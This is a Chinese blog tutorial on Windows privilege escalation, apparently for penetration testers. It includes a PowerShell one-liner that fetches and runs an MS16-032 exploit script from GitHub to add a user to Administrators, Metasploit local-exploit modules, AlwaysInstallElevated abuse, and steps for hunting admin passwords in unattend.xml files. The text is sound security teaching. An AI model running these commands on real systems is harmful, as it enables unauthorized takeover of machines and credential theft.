windows c++ 服务 当前用户提权_关于Windows下的提权方式(上)

最新推荐文章于 2024-05-12 05:52:30 发布
最新推荐文章于 2024-05-12 05:52:30 发布
阅读量862 收藏 1
点赞数
文章标签: windows c++ 服务 当前用户提权 windows cmd post请求 windows installer服务不能安装此升级 windows terminal下载 windows terminal修改背景 windows update medic service

Windows的四种权限:

  • User:普通用户权限,是系统中最安全的权限

  • Administrator:管理员权限

  • System:系统权限

  • TrustedInstaller:Windows中的最高权限。对于系统文件,即使拥有System权限也无法进行修改。只有拥有TrustedInstaller权限的用户才能修改系统文件

提权类别:

  • 纵向提权:低权限角色获得高权限角色的权限

  • 横向提权:获取同级别角色的权限

可能会用到的Windows命令:

net user  #列出该计算机上的用户net user   #列出指定用户所在用户组systeminfo  #获取系统信息wmic qfe get Caption,Description,HotFixID,InstalledOn  #列出以安装的补丁query user  #列出在线用户REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口tasklist /svc | find "TermService" + netstat -ano    #获取远程端口

提权方式

1、手动发现缺失的补丁

systeminfo 或wmic qfe get Caption,Description,HotFixID,InstalledOn

2229513fb76a267a41f434d7a478099a.png

寻找能够提权的EXP,将已安装的补丁编号与提权的EXP进行比较,然后使用没有安装的补丁的EXP进行提权,这里使用的是MS16-032 ——[KB3143141]

在cmd命令行中输入如下命令:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators test /add'"

当前用户为test属于Users组:

11ea7b75d798a9d55435b303cf5d56f3.png

执行命令后将test用户添加到了Administrators组中:

52cbe1f4a492aa904dfba4a40e06db91.png

2、利用Metasploit发现缺失补丁

使用Metasploit的post/windows/gather/enum_patches模块,根据系统编号快速找出系统中缺失的补丁,如图所示:

ea3dd72608111d8e0e523802f8e373ca.png

3、使用Windows Exploit Suggester工具

下载地址:

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可识别导致提权的漏洞,需要目标系统信息,使用systeminfo获取:

systeminfo > patches.txt

执行如下命令,从微软官方自动下载安全公告数据库:

./windows-exploit-suggester.py --update

下载的文件会在当前目录下以Excel表格的形式保存,需要安装xlrd模块来读取excel表格

pip install xlrd --upgrade

检查系统中是否存在未修补的漏洞:

./windows-exploit-suggester.py -d 2020-06-26-mssb.xls -i patches.txt

770a594a19370f9ee7d4159e38a5dbc8.png

4、利用系统给服务权限配置错误

可参考:https://422926799.github.io/posts/34b370c6.html

Windows系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。因此,如果一个低权限用户对此类系统服务调用的可执行文件拥有写权限,就可以将该文件替换成任意可执行文件,并随着系统服务的启动获得系统权限

系统服务权限配置错误有如下两种情况:

  • 服务未运行:攻击者会使用任意服务替换原来的服务,然后重启服务

  • 服务正在运行且无法终止:这种情况符合绝大多数的漏洞利用场景,攻击者通常会利用DLL劫持技术并尝试重启服务来提权

使用metasploit的exploit/windows/local/service_permissions 模块

4993bdde7b4fe09d7b031910f641fbb8.png

5、注册表键AlwaysInstallElevated

注册表键AlwaysInstallElevated是一个策略设置项。Windows允许低权限用户以System权限运行安装。如果启用了此策略设置项,那么任何权限的用户都能以 

NT AUTHORITY/SYSTEM 权限来安装恶意的MSI文件

该漏洞产生的原因是用户开启了Windows Installer特权安装功能

在cmd命令行中输入 "gpedit.msc"  打开组策略编辑器

  • 组策略—>计算机配置—>管理模块—>Windows组件—>Windows Installer—>永远以高特权进行安装:选择启用

  • 组策略—>用户配置—>管理模块—>Windows组件—>Windows Installer—>永远以高特权进行安装:选择启用

7e4db7bd76b3443d81a5c9f0cb8bdad6.png

设置完毕会在注册表以下两个位置自动创建键值"1":

  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Windows Installer 通过Msiexec.exe安装MSI文件包含的程序。Msiexec.exe 用于安装MSI文件,双击MSI文件就会运行Msiexec.exe

使用 Metasploit 的 exploit/windows/local/always_install_elevated 模块

b874936d724aae7cc3264287b0426b57.png

b0f7f7720f2df7f0c97a704ec26b060c.png

30a4dddec26c5415145da934134c5125.png

6、自动安装配置文件

网络管理员在内网中给多台机器配置同一环境时,通常不会逐台配置,而会使用脚本批量部署的方法。在这一过程中,会使用安装配置文件。这些文件中包含了所有的安装配置信息,可能还包含本地管理员账号密码等信息,如下:

C:\sysprep.infC:\sysprep\sysprep.xmlC:\Windows\system32\sysprep.infC:\Windows\system32\Sysprep\sysprep.xmlC:\unattend.xmlC:\Windows\Panther\Unattend.xmlC:\Windows\Panther\Unattended.xmlC:\Windows\Panther\Unattend\Unattend.xmlC:\Windows\Panther\Unattend\Unattended.xmlC:\Windows\system32\Sysprep\unattend.xmlC:\Windows\system32\Sysprep\Panther\unattend.xml

可执行如下命令搜索 unattend.xml 文件:

dir /b /s c:\unattend.xml

查看这样的文件是否存在管理员明文密码或经过Base64加密的密码

7、补充

使用如下命令查看计划任务:

schtasks /query /fo LIST /v

使用微软提供的工具AccessChk可列出权限配置有缺陷的文件在SysInterals套件中

下载地址:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk

执行如下命令,查看指定目录权限配置情况

accesschk.exe -dqv "C:\Windows" -accepteula

7ff5220ed9952d463ff881fa42d166f2.png

列出某驱动器下所有权限配置有缺陷的文件夹:

accesschk.exe -uwdqsv Users c:\*accesschk.exe -uwdqs "Authenticated Users" c:\*

列出某驱动器下所有权限配置有缺陷的文件:

accesschk.exe -uwdqsv Users c:\*.*accesschk.exe -uwdqs "Authenticated Users" c:\*.*
06b3206e3f28a5de5e6a2918ce5c6f64.png
weixin_39618121
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于C++当前程序提权
05-10
然而,在某些情况下,例如执行需要管理员权限的任务时,程序可能需要提权以获取更高的访问权限。本文将深入探讨如何使用C++来实现程序的权限提升。 首先,我们需要理解Windows中的权限模型。在Windows NT系统中,...
Windows C++使用Ftplib实现FTP客户端(整个工程)
02-28
Windows环境下,C++开发一个FTP客户端是一项常见的任务,它涉及到网络编程和文件操作等多个方面。Ftplib是一个常用的C++库,用于实现FTP协议。在这个项目中,我们将深入理解如何利用Ftplib构建一个完整的FTP客户端...
在任意文件夹下以管理员的身份运行powershell
DHFKDKF的博客
11-03 3373
写一个注册表 Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\Directory\Background\shell\PowerShellAsAdmin] @="Open PowerShell window here as administrator" "Extended"="" "HasLUAShield"="" "Icon"="powershell.exe" [HKEY_CLASSES_ROOT\Directory\Background\
Win 10以管理员身份运行Powershell的3种方法
热门推荐
weixin_39709920的博客
11-21 1万+
单击"开始"按钮以打开"开始"菜单, 展开Windows PowerShell 文件夹。右键单击 Windows PowerShell。选择"以管理员身份运行"。同时按键盘上的 Windows + R 键以打开"运行"框。键入 powershell 并按 Enter 键。这将以管理员身份运行PowerShell。在任务栏在搜索框中键入 powershell ,右键单击结果上的 Windows PowerShell,然后选择"以管理员身份运行"。
Windows C++: 提升代码权限,运行前、运行时。
最新发布
Bobowen的博客
05-12 1080
关联和区别:通过修改应用程序的清单文件,可以使程序在启动时默认要求管理员权限。与运行时动态获取权限的方法不同,清单文件的方法是固定和全局的。优点简单直接,不需要额外代码。一次配置后,程序始终要求管理员权限。缺点如果不需要所有操作都以管理员身份执行,此方法可能过于强制。使用场景:适合于所有操作都需要管理员权限的程序,例如系统工具或安装程序。这些方法从全局到局部、从简单到复杂提供了不同的获取管理员权限的方案。
PowerShell 如何以安全的方式使用密码,运行需要管理员权限的软件
一直被模仿,从未被超越
02-13 773
3、把 aes.key 跟 pwd.txt 拷到要运行的客户机上面。1、创建 AES,保存D盘下面。
c++ 提升应用程序的权限
leez0301的专栏
02-25 2362
1、判断当前用户权限是否管理员权限 BOOL IsRunAsAdmin() { BOOL fIsRunAsAdmin = FALSE; DWORD dwError = ERROR_SUCCESS; PSID pAdministratorsGroup = NULL; // Allocate and initialize a SID of the administrators group.
[提权] 使用 ShellCode 注入其他进程
LYSM
11-27 990
背景 如果将shellcode注入到具有特定权限的进程中,使用 ShellCode 创建的进程就可以获得与该进程相同的权限。 本次使用的工具,依旧是上次编写的PETools: https://www.cnblogs.com/LyShark/p/12960816.html 提权降权工具下载地址: https://www.blib.cn/soft/pexec.zip 枚举系统进程,与进程权限令牌等。 #include <stdio.h> #include <Windows.h> #inc
iniAdiPatten.rar_Windows_CE_Visual_C++_
08-11
标题中的“iniAdiPatten.rar_Windows_CE_Visual_C++_”表明这是一个与Windows CE操作系统相关的项目,其中包含了使用Visual C++编写的代码,可能是一个库或应用程序。这个项目特别关注的是“iniAdiPatten”函数,它...
Ftp.rar_c++ windows ftp
09-24
在这个名为“Ftp.rar”的压缩包中,包含了一个用C++语言编写的Windows FTP客户端小程序,名为“YYFtp”。这个程序允许用户连接到FTP服务器,执行上传、下载和其他与文件管理相关的操作。 C++是一种强大的、面向对象...
121212TreeCtrlUse.rar_Windows_CE_Visual_C++_
08-12
这个"121212TreeCtrlUse.rar"压缩包显然包含了关于如何在Visual C++下利用树形控件(Tree Control)进行编程的学习资料,特别针对初学者。树形控件在GUI应用中十分常见,它能以层级结构展示数据,便于用户进行浏览和...
c++获取system权限代码
03-09
程序运行有时需要更高的权限做更多的事情,本代码就是让c++程序获取system权限的代码
拥有TrustedInstaller权限
02-25
代码实现操作拥有TrustedInstaller权限的注册表项,有解释,有源码
windows提升权限总结
06-04
利用windows的漏洞提升windows的权限
给软件提升权限的方法
03-11
通过该方法操作,可以使软件以管理员身份运行,从而能够进行相当多的操作。
删除TrustedInstaller 权限控制的文件 源码
11-13
系统文件夹内,系统的必要组件,只有TrustedInstaller 才有所有处理权限。 普通用户无法删除修改,系统文件。 这个小程序,可以删除系统盘内 只有TructedInstaller 所有权限的文件。 VS2008 编译,WIN7X64 测试通过。 有需要的就拿去用吧。
获取system权限
光 的博客
09-23 1224
本人,小白一枚,本机实践成功,仅供参考
GetCurrentProcessID、OpenProcessToken
buptzwp的专栏
12-22 1786
GetCurrentProcessID        得到当前进程的ID    OpenProcessToken           得到进程的令牌句柄 LookupPrivilegeValue       查询进程的权限 AdjustTokenPrivileges      判断令牌权限   要对一个任意进程(包括系统安全进程和服务进程)进行指定了写相关的访问权
Windows VC++提升当前进程权限到管理员权限
ccf19881030的专栏
12-16 753
【代码】Windows VC++提升当前进程权限到管理员权限。
c++获取windows当前用户根目录
09-04
要获取Windows当前用户的根目录,可以使用下面的C++代码: ```cpp #include #include #include std::string getHomeDirectory() { char* homePath = getenv("USERPROFILE"); if (homePath == nullptr) { ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值